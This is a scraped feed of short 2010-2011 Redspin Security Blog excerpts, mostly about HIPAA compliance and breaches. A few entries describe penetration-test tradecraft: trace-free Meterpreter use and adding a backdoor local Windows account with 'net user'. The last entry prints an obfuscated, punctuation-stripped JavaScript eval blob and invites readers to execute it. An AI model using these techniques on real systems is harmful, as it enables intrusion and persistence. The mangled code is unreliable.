MidState Medical Center in Connecticut is a classic case The breach itself is indicative of a pretty vanilla data-loss vector While few details have been released, the hospital s own news release indicates http://www.secuobs.com/revue/news/297301.shtmlhttp://www.secuobs.com/revue/news/297301.shtml Secuobs.com : 2011-04-06 18:35:00 - Redspin Security Blog - RSA s release of additional information about their security breach impacting their SecureID multi-factor authentication system highlights important elements of an information security program These elements are particularly important in a healthcare IT environment To understand why, lets first review a rough outline of some widely reported details of the RSA attack Step 1 Attacker sends http://www.secuobs.com/revue/news/296660.shtmlhttp://www.secuobs.com/revue/news/296660.shtml Secuobs.com : 2011-04-05 16:11:07 - Redspin Security Blog - The latest big security breach to hit the news is an important reminder about a couple of key aspect of security While few details are available as to the nature of the breach, some general security principals apply Here are a couple that come to mind The existence of a security control is not the http://www.secuobs.com/revue/news/296331.shtmlhttp://www.secuobs.com/revue/news/296331.shtml Secuobs.com : 2011-04-05 00:23:49 - Redspin Security Blog - At the risk of over simplifying the role each of these groups play in the healthcare industry, the essence is the same different people trying to figure out the best way to securely use electronic protected health information ePHI and supporting technology However, without a single, industry-developed and accepted approach to securing ePHI, we http://www.secuobs.com/revue/news/296198.shtmlhttp://www.secuobs.com/revue/news/296198.shtml Secuobs.com : 2011-04-01 17:31:34 - Redspin Security Blog - There has been some debate as to the extent that a covered entity CE should audit a business associate BA to ensure that they are compliant with the HIPAA Security Rule and adequately safeguarding customer PHI While I don t offer up the answer to that question, I thought it made sense to explore some of the http://www.secuobs.com/revue/news/295702.shtmlhttp://www.secuobs.com/revue/news/295702.shtml Secuobs.com : 2011-03-28 20:51:40 - Redspin Security Blog - I just finished reading the ONC s Office of the National Coordinator for Health Information Technology draft document The Federal Health IT Strategic Plan the Plan while watching the Butler-Florida game in the quarterfinals the 2011 NCAA Championships One of the ONC s key responsibilities is to provide strategic leadership to the public and private sector Mandated http://www.secuobs.com/revue/news/294625.shtmlhttp://www.secuobs.com/revue/news/294625.shtml Secuobs.com : 2011-03-20 16:30:14 - Redspin Security Blog - It s big news that RSA s infrastructure around their SecureID solution has been compromised While information around this attack and its impact on customers is lacking RSA is citing an ongoing investigation as a reason to limit public disclosure a couple of lessons about general security management can be learned The first lesson is around vendor http://www.secuobs.com/revue/news/292918.shtmlhttp://www.secuobs.com/revue/news/292918.shtml Secuobs.com : 2011-03-17 17:28:05 - Redspin Security Blog - The Office of Civil Rights OCR is responsible for issuing annual guidance on the provisions in the HIPAA Security Rule 45 CFR 164302 318 But with so much recent interest in IT security driven by the meaningful use incentive program, we want to share some our observations and perspectives from recent Redspin client http://www.secuobs.com/revue/news/292347.shtmlhttp://www.secuobs.com/revue/news/292347.shtml Secuobs.com : 2011-03-15 18:21:32 - Redspin Security Blog - The Meterpreter shell in Metasploit is a fantastic way to interact with a compromised box It runs entirely in memory and leaves no trace of itself after you disconnect, allowing you to pillage and plunder cleanly without leaving any tracks I find myself using it fairly frequently against Windows machines that I ve already gotten credentials http://www.secuobs.com/revue/news/291770.shtmlhttp://www.secuobs.com/revue/news/291770.shtml Secuobs.com : 2011-03-10 22:07:43 - Redspin Security Blog - I received an email notification about State Attorneys General HIPAA enforcement training posted by Joseph Conn at ModernHealthcarecom The HITECH Act gave authority for state attorneys general to bring civil actions to obtain monetary damages for residents in their state for HIPAA Security Rule and Privacy Rule What might it mean that the Office of Civil Rights http://www.secuobs.com/revue/news/290814.shtmlhttp://www.secuobs.com/revue/news/290814.shtml Secuobs.com : 2011-03-09 21:56:53 - Redspin Security Blog - Here we discuss the need for, and an approach for developing, a structured Business Associate oversight program for data security risk management HIPAA and the HITECH Act have highlighted the importance of Business Associate BA security Covered Entities CEs need to effectively manage Business Associates security risk, and BAs need to understand their compliance requirements http://www.secuobs.com/revue/news/290545.shtmlhttp://www.secuobs.com/revue/news/290545.shtml Secuobs.com : 2011-03-08 16:25:42 - Redspin Security Blog - Its always educational to review a data security breach to see what can be learned In the case of the Charleston Area Medical Center CAMC last month a number of lessons can be learned First lets review what we know and don t know about the data breach which happened at CAMC subsidiary CAMC Health Education http://www.secuobs.com/revue/news/290156.shtmlhttp://www.secuobs.com/revue/news/290156.shtml Secuobs.com : 2011-03-07 18:07:47 - Redspin Security Blog - HITECH and the notice of proposed rule making NPRM published in the Federal Register July 14, 2010 significantly impact how Covered Entities CEs and Business Associates BAs manage health IT security risk under HIPAA It has, in effect, created an ePHI supply chain in which everyone on the chain needs to worry about the security http://www.secuobs.com/revue/news/289910.shtmlhttp://www.secuobs.com/revue/news/289910.shtml Secuobs.com : 2011-03-03 20:43:15 - Redspin Security Blog - Just hacked a box on a penetration test but can t get a Meterpreter shell on it for some reason Add yourself a new account quickly with these easy commands Works on all current versions of Windows assuming you ve got an admin-level account Add local account of goat with password of T styHay net user add goat http://www.secuobs.com/revue/news/289210.shtmlhttp://www.secuobs.com/revue/news/289210.shtml Secuobs.com : 2011-03-01 01:17:39 - Redspin Security Blog - A report recently released by Deloitte performs a nice literature review including industry white papers and surveys, congressional testimony, and related journals Interesting results include 71pourcents of HHS-reported information breaches are from Health Care Providers The impact of a data breach over a two-year period is approximately 2 million per organization and the lifetime value http://www.secuobs.com/revue/news/288333.shtmlhttp://www.secuobs.com/revue/news/288333.shtml Secuobs.com : 2011-02-23 16:32:56 - Redspin Security Blog - The 2009 HITECH Act authorized the Health and Human Resources Office for Civil Rights HHS OCR to add teeth to existing security and privacy regulations, and they ve obviously taken the responsibility seriously On the same day that HHS OCR imposed a whopping 43 million dollar fine on Maryland-based Cignet Health for violating a provision of http://www.secuobs.com/revue/news/287178.shtmlhttp://www.secuobs.com/revue/news/287178.shtml Secuobs.com : 2011-02-20 05:06:06 - Redspin Security Blog - In the popular TV series 8 Simple Rules for Dating My Teenage Daughter, the rules may have been a bit exaggerated but they sure made their point Rule 1 Use your hands on my daughter and you ll lose them after Likewise, my 8 Simple Rules for Protecting PHI strike a similar chord no threats http://www.secuobs.com/revue/news/286474.shtmlhttp://www.secuobs.com/revue/news/286474.shtml Secuobs.com : 2011-02-18 22:02:21 - Redspin Security Blog - Since our 2010 Protected Health Information Breach Report was released, we have been asked a lot about trends in the industry Well, just in the last couple weeks, a number of breaches have been released that occurred at the end of 2010 This includes 16 incidents, over half the result of theft and involving some http://www.secuobs.com/revue/news/286313.shtmlhttp://www.secuobs.com/revue/news/286313.shtml Secuobs.com : 2011-02-15 00:31:43 - Redspin Security Blog - As any reasonably sized covered entity will attest, it is not unusual to have hundreds of Business Associates partners who have access to ePHI While your own security may be adequate to protect your ePHI, a breach by a Business Associate will result in substantial impact and the data breach is required to be disclosed http://www.secuobs.com/revue/news/285215.shtmlhttp://www.secuobs.com/revue/news/285215.shtml Secuobs.com : 2011-02-09 20:33:05 - Redspin Security Blog - Redspin just released their annual report of protected health information breaches that occurred from late 2009 through the end of 2010 Over 200 breaches affecting 6,067,751 individuals have been recorded since August 2009 when the interim final breach notification regulation was issued as part of the Health Information Technology for Economic and Clinical Health HITECH http://www.secuobs.com/revue/news/284075.shtmlhttp://www.secuobs.com/revue/news/284075.shtml Secuobs.com : 2011-02-06 17:12:28 - Redspin Security Blog - The breach on Nasdaq s Directors Desk application provides an interesting opportunity to analyze their actual state of security with their advertised state of security According to the Directors Desk website Directors Desk has taken extreme measures to protect user information against unauthorized access Given the confidential nature of public company board meetings what they http://www.secuobs.com/revue/news/283273.shtmlhttp://www.secuobs.com/revue/news/283273.shtml Secuobs.com : 2011-02-06 08:36:39 - Redspin Security Blog - Nasdaq has acknowledged that suspicious files were found on some of its systems The files were apparently a result of hackers gaining access to at least one of their servers http://www.secuobs.com/revue/news/283254.shtmlhttp://www.secuobs.com/revue/news/283254.shtml Secuobs.com : 2011-02-02 03:33:37 - Redspin Security Blog - The LM hash is a horrifying relic left over from the dark ages of Windows 95 Also known as the LanMan, or LAN Manager hash, it is enabled by default on all Windows client and server versions up to Windows Server 2008 where it was finally turned off by default thank you Microsoft So what s http://www.secuobs.com/revue/news/282320.shtmlhttp://www.secuobs.com/revue/news/282320.shtml Secuobs.com : 2011-01-31 19:26:03 - Redspin Security Blog - The bar has been raised on how covered entities manage Business Associates BAs the HITECH Act breach notification requirements, penalties for electronic protected health information ePHI disclosure, and the expectation that Business Associates be compliant with the HIPAA Security Rule mean that covered entities need to ensure proper due-diligence when managing BAs In a perfect http://www.secuobs.com/revue/news/281916.shtmlhttp://www.secuobs.com/revue/news/281916.shtml Secuobs.com : 2011-01-28 02:38:15 - Redspin Security Blog - Last June, one of my colleagues at Redspin blogged about his concern that security flaws in software applications that house ePHI electronic protected health information represent a big threat We had just completed a security assessment for a client and had found it relatively easy to access their customer portal using a common SQL injection http://www.secuobs.com/revue/news/281319.shtmlhttp://www.secuobs.com/revue/news/281319.shtml Secuobs.com : 2011-01-27 22:50:03 - Redspin Security Blog - Why is Apple successful Design I don t mean they make great looking hardware I also don t mean they make great looking software Design is much more than looks Donald Norman s The Design of Everyday Things goes into detail about how good design is more about usability than looks In good design, everything just works Why http://www.secuobs.com/revue/news/281259.shtmlhttp://www.secuobs.com/revue/news/281259.shtml Secuobs.com : 2011-01-25 23:50:37 - Redspin Security Blog - The top complaint I hear about healthcare IT systems when talking with clients is lack of interoperability Once you pick one vendor for one system, you pretty much have to stick with them for everything If you want information from one department or system to work with another department or system, everything has to come http://www.secuobs.com/revue/news/280729.shtmlhttp://www.secuobs.com/revue/news/280729.shtml Secuobs.com : 2011-01-25 19:58:49 - Redspin Security Blog - I remember back in the day when I was reading The Art of Deception by Kevin Mitnick in which he said the social engineer is able to take advantage of people to obtain information with or without the use of technology We all know the reasons as to why someone would want to social http://www.secuobs.com/revue/news/280682.shtmlhttp://www.secuobs.com/revue/news/280682.shtml Secuobs.com : 2011-01-24 21:08:32 - Redspin Security Blog - Last Wednesday, Republicans in the House of Representatives 3 Democrats voted to repeal the health-care reforms signed into law by President Obama less than 1 year ago Although the 245-189 vote made good on a GOP mid-term election promise, it was largely symbolic The Senate is not likely to consider much less pass the bill, http://www.secuobs.com/revue/news/280407.shtmlhttp://www.secuobs.com/revue/news/280407.shtml Secuobs.com : 2011-01-21 22:03:31 - Redspin Security Blog - Mobile devices like the iPhone and iPad are a top security concern for 2011 The first step to addressing this risk is to put a security policy in place that addresses mobile devices We recently released a free Mobile Security Policy template to help folks get started If you don t have a mobile security policy http://www.secuobs.com/revue/news/279989.shtmlhttp://www.secuobs.com/revue/news/279989.shtml Secuobs.com : 2011-01-20 23:48:40 - Redspin Security Blog - The HIPAA Security Rule now applies to Business Associates We anxiously await for the final modifications due to be released in March However, the problem is your Business Associates have access to your ePHI right now There really is no time to wait for the auditing requirements in the HITECH Act to be further defined http://www.secuobs.com/revue/news/279741.shtmlhttp://www.secuobs.com/revue/news/279741.shtml Secuobs.com : 2011-01-20 23:48:40 - Redspin Security Blog - Twitter feeds have been abuzz with talk of the latest Twitter worm that lures victims into a scareware page telling them they have a virus, only to subsequently infect them with real malware Twitter engineers have done a stellar job reducing the spread of the malware from thousands of results this morning to none this http://www.secuobs.com/revue/news/279740.shtmlhttp://www.secuobs.com/revue/news/279740.shtml Secuobs.com : 2011-01-17 22:07:17 - Redspin Security Blog - Managing vendors and business partners is hard in any industry, but when the data is sensitive ePHI, you are trying to achieve EHR meaningful use and there are penalties like the HITECH Act s breach notification requirements, it can be even more daunting Fortunately, one aspect of the HITECH Act can minimize security risk and facilitate managing http://www.secuobs.com/revue/news/278775.shtmlhttp://www.secuobs.com/revue/news/278775.shtml Secuobs.com : 2011-01-14 21:27:41 - Redspin Security Blog - It seems all too often my friends are having their accounts hacked I get emails from them trying to hawk iPads or Facebook messages about Lady Gaga There are three problems I see here 1 Users choose poor passwords This was shown in the recent Gawker hacks and pretty much every other username password database breach in http://www.secuobs.com/revue/news/278342.shtmlhttp://www.secuobs.com/revue/news/278342.shtml Secuobs.com : 2011-01-14 21:27:41 - Redspin Security Blog - A few days ago, members of the College of Healthcare Information Management Executives CHIME testified before a federal panel in Washington, DC The hearing was entitled Real World Experience Working with Meaningful Use The panel consisted of members of the Implementation Workgroup of the HIT Standards Committee, who in turn report to David Blumenthal, MD, http://www.secuobs.com/revue/news/278341.shtmlhttp://www.secuobs.com/revue/news/278341.shtml Secuobs.com : 2011-01-13 19:17:42 - Redspin Security Blog - It s a common scenario you re on the road in an airport, at a hotel, at a coffee shop, at a hacker con any number of locations and you need access to the Internet There is generally WiFi at all of these locations Some charge, some are free, but http://www.secuobs.com/revue/news/278033.shtmlhttp://www.secuobs.com/revue/news/278033.shtml Secuobs.com : 2011-01-12 19:52:32 - Redspin Security Blog - The rumors of IPV4 s demise and the impending move to IPV6 have been going around for the last fifteen years IPV4 defines an address in numerical format such as 20985143104 With the growth in the number of systems the folks allocating addresses ARIN realized that we were going to run http://www.secuobs.com/revue/news/277792.shtmlhttp://www.secuobs.com/revue/news/277792.shtml Secuobs.com : 2011-01-11 23:24:23 - Redspin Security Blog - Version 20 of the PCI DSS has clarified their testing expectations by requiring 1 external vulnerability scanning by an ASV quarterly as well as scanning following any significant change can be performed by internal staff , 2 internal vulnerability scanning quarterly and after significant changes by qualified and independent internal staff or third-parties, 3 annual external http://www.secuobs.com/revue/news/277512.shtmlhttp://www.secuobs.com/revue/news/277512.shtml Secuobs.com : 2011-01-11 23:24:23 - Redspin Security Blog - On January 4th, Kroll, a worldwide risk consultancy firm headquartered in New York, released their top 10 data security issues for 2011 Two days later, we published Redspin s top 10 security issues for 2011 I promise, we didn t read their version first So aside from the coincidence, it s the differences between http://www.secuobs.com/revue/news/277511.shtmlhttp://www.secuobs.com/revue/news/277511.shtml Secuobs.com : 2011-01-10 19:18:48 - Redspin Security Blog - The IBMcom developer portal was defaced early Sunday morning by a group of Indonesian hackers calling themselves Hmei7 Although the vulnerability exploited by the hackers is still unknown, Hmei7 differentiates itself from other groups by releasing tools to the underground hacking community The tools page listed in some of the very numerous group defacements includes a variety of web application http://www.secuobs.com/revue/news/277165.shtmlhttp://www.secuobs.com/revue/news/277165.shtml Secuobs.com : 2011-01-10 19:18:48 - Redspin Security Blog - With the federal EHR incentive program kicking off, is your organization scrambling to achieve meaningful use criteria for your EHR systems Given all the questions we ve been hearing about how healthcare organizations can effectively address the meaningful use requirements, I thought I would share a practical approach to addressing the core objective protect electronic health information In http://www.secuobs.com/revue/news/277164.shtmlhttp://www.secuobs.com/revue/news/277164.shtml Secuobs.com : 2011-01-08 01:18:41 - Redspin Security Blog - In advance of the much anticipated full report due on January 11th from the National Commission on the BP Deepwater Horizon Oil Spill and Offshore Drilling, a chapter was recently released outlining some key findings that are relevant not only to the oil industry but also every other enterprise Low Low High The well blew http://www.secuobs.com/revue/news/276740.shtmlhttp://www.secuobs.com/revue/news/276740.shtml Secuobs.com : 2011-01-07 22:01:30 - Redspin Security Blog - We frequently are asked about the Experian Independent Third Party Assessment EI3PA The EI3PA is the Experian assessment requirements they impose on third parties that have access to credit history information Not much of the documentation is publicly available so we thought we would share our insights based on our experience and reviewing the http://www.secuobs.com/revue/news/276669.shtmlhttp://www.secuobs.com/revue/news/276669.shtml Secuobs.com : 2011-01-06 20:39:02 - Redspin Security Blog - Today Apple launched the Mac App Store, a marketplace for small apps and widgets on Mac OSX Until recently, the app marketplace has been dominated by smartphone based stores such as the iPhone App Store which also services iPod and iPad users and the Android Marketplace Recently, however, Google launched the Chrome Web Store for browser extensions in http://www.secuobs.com/revue/news/276357.shtmlhttp://www.secuobs.com/revue/news/276357.shtml Secuobs.com : 2011-01-05 01:06:32 - Redspin Security Blog - Some of my clients in the financial sector, specifically the online banking space have asked about Prevx Prevx What is it The companies flagship product Prevx 30 according to their website provides the world s smallest, fastest, and lightest endpoint security agent yet its detection, protection and removal capabilities rival even the largest antivirus solutions Prevx specializes in http://www.secuobs.com/revue/news/275814.shtmlhttp://www.secuobs.com/revue/news/275814.shtml Secuobs.com : 2011-01-04 23:14:23 - Redspin Security Blog - Registration begins this week for the Medicare and Medicaid Electronic Health Records EHR incentive programs With the programs contingent on meaningful use of certified EHR technology, the big question now is how to achieve meaningful use According to a mid-november survey by the College of Health Information Management Executives CHIME released on December 9, 2010, this won t http://www.secuobs.com/revue/news/275798.shtmlhttp://www.secuobs.com/revue/news/275798.shtml Secuobs.com : 2010-12-31 01:58:00 - Redspin Security Blog - OK so, I can t resist commenting on this breaking news and I m looking forward to seeing where it ends up It has a little bit of everything in it potential invasion of privacy, allegations of hacking, accusations of adultery, maybe even overzealous prosecution and the list goes on You d think this was a story http://www.secuobs.com/revue/news/275011.shtmlhttp://www.secuobs.com/revue/news/275011.shtml Secuobs.com : 2010-12-30 22:16:17 - Redspin Security Blog - It has been a long year, but the weeks on the road have paid gastronomic dividends Gems uncovered, old standards revisited, experiments gone bad Congratulations to this year s winners Best Dish Fresh Trout Luncheon Special, Mac s Old House, Antioch CA Nothing beats fresh delta fish Finalists Falafel, Azuri Cafe, NYC Cereal Milk, Momofuku s Milk Bar, NYC Cinnamon Roll, Stella s Kitchen http://www.secuobs.com/revue/news/274954.shtmlhttp://www.secuobs.com/revue/news/274954.shtml Secuobs.com : 2010-12-29 22:13:54 - Redspin Security Blog - Year end is always a great time to reflect and assess resolutions, improvements and goals, which makes me think about major improvements banks and financial organizations have made towards security in the last year Most companies are doing everything they can to make sure the customer has a safe, secure and somewhat enjoyable hassle-free experience with http://www.secuobs.com/revue/news/274773.shtmlhttp://www.secuobs.com/revue/news/274773.shtml Secuobs.com : 2010-12-29 18:51:25 - Redspin Security Blog - Have a fresh Microsoft Windows 2003 or 2008 domain just deployed and don t know where to start Inherited a potentially questionable domain and looking for some basic things to check Already know what you re doing and want a sanity-check Here are the recommended Password Policy settings to configure to try and creep towards that impossible balance http://www.secuobs.com/revue/news/274736.shtmlhttp://www.secuobs.com/revue/news/274736.shtml Secuobs.com : 2010-12-28 20:49:43 - Redspin Security Blog - Performing security assessments for our clients, not only brings us around the globe, but also provides a global view of effective security processes Here are the key attributes we see in our clients that are successfully managing security risk process, process, process Whether our view of client security operations is from an external perspective ie http://www.secuobs.com/revue/news/274554.shtmlhttp://www.secuobs.com/revue/news/274554.shtml Secuobs.com : 2010-12-27 19:01:53 - Redspin Security Blog - Designing an effective Information Security Program is a process that requires a thorough knowledge of your assets what you re protecting and the threat sources the type of entity that might try to get it Understanding these two factors is foundational to building an Infosec program Based on the results http://www.secuobs.com/revue/news/274368.shtmlhttp://www.secuobs.com/revue/news/274368.shtml Secuobs.com : 2010-12-23 22:10:17 - Redspin Security Blog - HHS delivered an early Christmas present today with its announcement that registration for the Medicare and Medicaid electronic health record EHR system incentive programs opens on January 3rd Blumenthal, head of the HHS Office of the National Coordinator for Health Information Technology is urging inter-connectivity for the benefit of patient, providers, payers, employees, the national http://www.secuobs.com/revue/news/273948.shtmlhttp://www.secuobs.com/revue/news/273948.shtml Secuobs.com : 2010-12-22 20:38:56 - Redspin Security Blog - Garnet Hill data breach Is this related to the McDonalds email provider breach What preferences were stored about me http://www.secuobs.com/revue/news/273656.shtmlhttp://www.secuobs.com/revue/news/273656.shtml Secuobs.com : 2010-12-21 02:49:23 - Redspin Security Blog - In the post-9 11 world, disparate government agencies took flack for their need-to-know data sharing policies To improve intelligence efforts, a need-to-share policy was employed, ideally resulting in more efficient communication and flow of inter-agency information A need-to-share policy, however, also increases the risk of unauthorized access due to an increased threat-source population Is opening up http://www.secuobs.com/revue/news/273236.shtmlhttp://www.secuobs.com/revue/news/273236.shtml Secuobs.com : 2010-12-20 23:18:28 - Redspin Security Blog - In the post-9 11 world, disparate government agencies took flack for their need-to-know data sharing policies To improve intelligence efforts, a need-to-share policy was employed, ideally resulting in more efficient communication and flow of inter-agency information A need-to-share policy, however, also increases the risk of unauthorized access due to an increased threat-source population Is opening up http://www.secuobs.com/revue/news/273214.shtmlhttp://www.secuobs.com/revue/news/273214.shtml Secuobs.com : 2010-12-20 21:48:32 - Redspin Security Blog - Not so long ago came a device that offered everything you could ever want a high powered processor, big display, portability, slick navigation, and a seemingly-endless supply of applications to choose from Yet, one stood out above the rest solitaire the Windows 31 killer app Fast-forward to the present and the whole plane-load of iPad-toting execs http://www.secuobs.com/revue/news/273196.shtmlhttp://www.secuobs.com/revue/news/273196.shtml Secuobs.com : 2010-12-17 19:47:05 - Redspin Security Blog - Information Security policies without technical controls are not effective Consider traffic laws such as speed limits The policy on the 101 freeway right by our office is that cars should go no faster than 65 miles hour and trucks should go no faster than 55 miles hour Many people choose to drive at speeds over 80 miles hour http://www.secuobs.com/revue/news/272655.shtmlhttp://www.secuobs.com/revue/news/272655.shtml Secuobs.com : 2010-12-16 23:39:06 - Redspin Security Blog - I m often amazed how often the IT security industry claims more security lowers their risk More security does not always mean more secure Yet, the industry often doesn t realize how several supposedly harmless aspects of security can unexpectedly raise risk Let me explain with these examples DLP First, let s examine Data Loss Prevention DLP software and http://www.secuobs.com/revue/news/272379.shtmlhttp://www.secuobs.com/revue/news/272379.shtml Secuobs.com : 2010-12-16 00:33:24 - Redspin Security Blog - Everyone has a smart phone Everyone is downloading apps Every day is Bring your toy to work day Portable media introduces unique risks for which existing controls are less effective What are these risks Are they unique to your institution For those of you who have time, let s run those pesky mobile devices through your trusted http://www.secuobs.com/revue/news/272098.shtmlhttp://www.secuobs.com/revue/news/272098.shtml Secuobs.com : 2010-12-15 02:23:40 - Redspin Security Blog - Hackers have gotten a hold of the database containing usernames and passwords of roughly 14 million users who have posted a comment to the Gawker website or any of its popular affiliates, including lifehackercom, gizmodocom, jalopnikcom, jezebelcom, kotakucom, deadspincom and others They are not keeping this database to themselves either They ve uploaded the entire thing http://www.secuobs.com/revue/news/271777.shtmlhttp://www.secuobs.com/revue/news/271777.shtml Secuobs.com : 2010-12-09 03:37:06 - Redspin Security Blog - In the wake of MasterCard shutting down Wikileaksorg s merchant account, an anonymous group of Hackers , who collectively call themselves Anonymous have taken upon themselves to exact some vigilante justice against the evil free-speech suppressing corporation Of course Mastercard, PayPal, and PostFinancech, Visacom and Amazoncom the other targets named in Project Payback have been http://www.secuobs.com/revue/news/270436.shtmlhttp://www.secuobs.com/revue/news/270436.shtml Secuobs.com : 2010-12-08 20:58:34 - Redspin Security Blog - Google launched the Chrome Web Store this week, much to the delight of Chrome users and Google shareholders alike Branching off of the success of the Android Market also owned by Google , the Chrome Web Store allows developers to easily sell Chrome browser extensions The popularity of OSX widgets and the announced Mac App Store , Windows gadgets http://www.secuobs.com/revue/news/270323.shtmlhttp://www.secuobs.com/revue/news/270323.shtml Secuobs.com : 2010-11-24 19:15:55 - Redspin Security Blog - Developing native mobile applications as opposed to HTML5-based apps adds complexity to mobile application security management Peter Yared from Webtrends Apps, recently posted an insightful blog entry where he points out that developing native applications for each mobile platform ie iPhone, Android, Windows Mobile, Blackberry, SymbianOS, WebOS is not practical because the development and maintenance http://www.secuobs.com/revue/news/267251.shtmlhttp://www.secuobs.com/revue/news/267251.shtml Secuobs.com : 2010-11-23 23:59:47 - Redspin Security Blog - Many claim that Stuxnet will usher in a new kind of cyber war Stuxnet does introduce a previously unexplored area of attacking power facilities via USB stick, however, vulnerabilities in these systems theoretically accessible to foreign hackers are not new at all SCADA systems that control the United States power grid have been widely declared as vulnerable http://www.secuobs.com/revue/news/267039.shtmlhttp://www.secuobs.com/revue/news/267039.shtml Secuobs.com : 2010-11-18 20:08:24 - Redspin Security Blog - No self respecting security engineer will tell you that they rely on automated vulnerability scanners to do the bulk of their analysis Juicy findings that demonstrate the severity of the threat they represent usually come from thorough manual analysis As a security engineer, it is this manual analysis of software that I live for, and http://www.secuobs.com/revue/news/265853.shtmlhttp://www.secuobs.com/revue/news/265853.shtml Secuobs.com : 2010-11-17 20:55:24 - Redspin Security Blog - How do we manage security when our users are integrating smart phones and other mobile devices into the workplace This is a question we hear more and more from our customers as their employees are buying mobile devices such as iPads, iPhones, Blackberries, and Android driven products The rising tide of usage of these devices http://www.secuobs.com/revue/news/265610.shtmlhttp://www.secuobs.com/revue/news/265610.shtml Secuobs.com : 2010-11-08 04:10:12 - Redspin Security Blog - There have been quite a few headlines recently regarding various aspects of cyber war A number if folks in the information security community have contributed to the discussion I happen to like the comments from Ben Tomhave and Richard Bejtlich There is an interesting crossover between the military domain and the commercial http://www.secuobs.com/revue/news/263116.shtmlhttp://www.secuobs.com/revue/news/263116.shtml Secuobs.com : 2010-10-31 23:50:21 - Redspin Security Blog - I bought an iPhone 4 last week It has 32 GB of memory, nearly as much as my two and a half year old Windows notebook It does a lot of cool things and as Steve Jobs would say, it is insanely great Now having said that, one of the reasons I http://www.secuobs.com/revue/news/261358.shtmlhttp://www.secuobs.com/revue/news/261358.shtml Secuobs.com : 2010-10-26 18:11:22 - Redspin Security Blog - In the last few weeks I have talked with several customers about their data loss prevention initiatives It seems that most of the programs are focused on inadvertent data loss These are issues such as employees sending spreadsheets with PII data to their Gmail account so they can be productive at home a http://www.secuobs.com/revue/news/259983.shtmlhttp://www.secuobs.com/revue/news/259983.shtml Secuobs.com : 2010-10-18 23:42:39 - Redspin Security Blog - Often the government sector is viewed as unwieldy and cumbersome when it comes to moving rapidly to take advantage of new technology When it comes to information security this is often the case as well Since 2002, the US Federal Information Security Management Act FISMA has been used to help government agencies manage http://www.secuobs.com/revue/news/258010.shtmlhttp://www.secuobs.com/revue/news/258010.shtml Secuobs.com : 2010-10-18 04:34:42 - Redspin Security Blog - Often the government sector is viewed as unwieldy and cumbersome when it comes to moving rapidly to take advantage of new technology When it comes to information security this is often the case as well Since 2002, the US Federal Information Security Management Act FISMA has been used to help government agencies manage http://www.secuobs.com/revue/news/257741.shtmlhttp://www.secuobs.com/revue/news/257741.shtml Secuobs.com : 2010-10-11 21:50:59 - Redspin Security Blog - More often than not security and IT teams might not care to admit that decisions around information security sometimes get made in an ad hoc fashion Organizations should invest in developing the processes to make systematic decisions about how to understand the threat environment and the optimum mechanisms to protect their business The http://www.secuobs.com/revue/news/255944.shtmlhttp://www.secuobs.com/revue/news/255944.shtml Secuobs.com : 2010-10-10 03:44:16 - Redspin Security Blog - More often than many security and IT teams might care to admit, decisions around information security sometimes get made in an ad hoc fashion Organizations should invest in developing the processes to make systematic decisions about how to understand the threat environment and the optimum mechanisms to protect their business The following discussion http://www.secuobs.com/revue/news/255612.shtmlhttp://www.secuobs.com/revue/news/255612.shtml Secuobs.com : 2010-10-07 00:13:53 - Redspin Security Blog - Following up on my last NMAP post, processing port scan data in a meaningful manner is essential to network penetration testing For those who wish to skip the SQL stage and get quick results, the following one-liner will use xmlstarlet to parse a NMAP XML file cat nmapxml xmlstarlet sel -T -t -m state state 'open' -m http://www.secuobs.com/revue/news/254895.shtmlhttp://www.secuobs.com/revue/news/254895.shtml Secuobs.com : 2010-09-30 01:33:27 - Redspin Security Blog - Today, we observed some potentially dangerous Javascript client-side code out in the wild The code, which we were able to obtain at great lengths, is reproduced below _0x65f5 x36 x3D x5B x22 x5C x6A x5C x69 x5C x61 x5C x6E x5C x38 x5C x62 x22 x2C x22 x5C x68 x5C x61 x5C x37 x5C x6B x5C x62 x5C x37 x5C x6F x5C x66 x5C x37 x5C x70 x5C x37 x5C x67 x5C x62 x22 x2C x22 x5C x6B x5C x38 x5C x38 x5C x37 x5C x67 x5C x39 x5C x69 x5C x65 x5C x6D x5C x66 x5C x39 x22 x2C x22 x5C x71 x5C x72 x5C x39 x5C x6C x22 x2C x22 x5C x6A x5C x61 x5C x68 x22 x2C x22 x5C x63 x5C x63 x5C x38 x5C x74 x5C x79 x5C x7A x5C x41 x5C x78 x5C x63 x5C x65 x5C x77 x22 x5D x3B x64 x3D x75 x3B x73 x3D x64 x5B x36 x5B x31 x5D x5D x28 x36 x5B x30 x5D x29 x3B x64 x5B x36 x5B x33 x5D x5D x5B x36 x5B x32 x5D x5D x28 x73 x29 x3B x73 x5B x36 x5B x34 x5D x5D x3D x36 x5B x35 x5D x3B x76 x28 x30 x29 x3B , x7C , x73 x70 x6C x69 x74 , x7C x7C x7C x7C x7C x7C x5F x30 x78 x65 x30 x61 x32 x7C x78 x36 x35 x7C x78 x37 x30 x7C x78 x36 x34 x7C x78 x37 x32 x7C x78 x37 x34 x7C x78 x32 x46 x7C x7C x78 x36 x38 x7C x78 x36 x43 x7C x78 x36 x45 x7C x78 x36 x33 x7C x78 x34 x33 x7C x78 x37 x33 x7C x78 x36 x31 x7C x78 x37 x39 x7C x78 x36 x39 x7C x78 x34 x39 x7C x78 x34 x35 x7C x78 x36 x44 x7C x78 x36 x32 x7C x78 x36 x46 x7C x7C x78 x33 x33 x7C x64 x6F x63 x75 x6D x65 x6E x74 x7C x76 x4F x49 x64 x7C x78 x37 x41 x7C x78 x35 x33 x7C x78 x34 x45 x7C x78 x32 x45 x7C x78 x37 x35 , , x66 x72 x6F x6D x43 x68 x61 x72 x43 x6F x64 x65 , x72 x65 x70 x6C x61 x63 x65 , x5C x77 x2B , x5C x62 , x67 eval function 0xf47fx1,_0xf47fx2,_0xf47fx3,_0xf47fx4,_0xf47fx5,_0xf47fx6 0xf47fx5 function 0xf47fx3 return 0xf47fx335 String 0x65f5 5 0xf47fx3 29 0xf47fx3toString 36 if 0x65f5 4 0x65f5 6 ,String while 0xf47fx3-- 0xf47fx6 0xf47fx5 0xf47fx3 0xf47fx4 0xf47fx3 0xf47fx5 0xf47fx3 0xf47fx4 function 0xf47fx5 return _0xf47fx6 0xf47fx5 0xf47fx5 function return _0x65f5 7 0xf47fx3 1 while 0xf47fx3-- if 0xf47fx4 0xf47fx3 0xf47fx1 0xf47fx1 0x65f5 6 new RegExp 0x65f5 8 0xf47fx5 0xf47fx3 0x65f5 8 ,_0x65f5 9 ,_0xf47fx4 0xf47fx3 return _0xf47fx1 0x65f5 0 ,37,37,_0x65f5 3 0x65f5 2 0x65f5 1 ,0, For those brave of heart, you can test and execute it 